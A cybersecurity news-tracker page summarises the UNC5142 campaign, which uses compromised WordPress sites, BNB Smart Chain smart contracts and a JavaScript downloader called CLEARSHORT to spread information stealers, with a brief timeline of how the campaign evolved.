CyberHappenings logo

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

UNC5142 Abuses Blockchain Smart Contracts to Spread Malware via Compromised WordPress Sites

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A financially motivated threat actor, UNC5142, has been exploiting blockchain smart contracts to distribute information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar on Windows and macOS systems. The attacks leverage compromised WordPress websites and a technique called 'EtherHiding' to hide malicious code on public blockchains. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT to deliver malware, with the first stage interacting with a malicious smart contract on the BNB Smart Chain. The smart contract retrieves a landing page from an external server, which then employs social engineering tactics to infect the system. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating a broad targeting of vulnerable WordPress sites. However, no activity has been observed since July 23, 2025.

Timeline

  1. 16.10.2025 17:52 1 articles · 11h ago

    UNC5142 Campaign Evolves with Blockchain Smart Contracts

    UNC5142 has been observed using compromised WordPress sites and blockchain smart contracts to distribute information stealers. The campaign employs a multi-stage JavaScript downloader named CLEARSHORT, which interacts with malicious smart contracts on the BNB Smart Chain. The attacks target both Windows and macOS systems, using social engineering tactics to infect victims. The campaign has evolved from a single-contract system to a more sophisticated three-smart contract system, allowing for rapid updates and increased resilience. The threat actor uses two distinct sets of smart contract infrastructures, with the Main infrastructure serving as the core campaign infrastructure and the Secondary infrastructure supporting specific surges in activity or testing new lures.

    Show sources

Information Snippets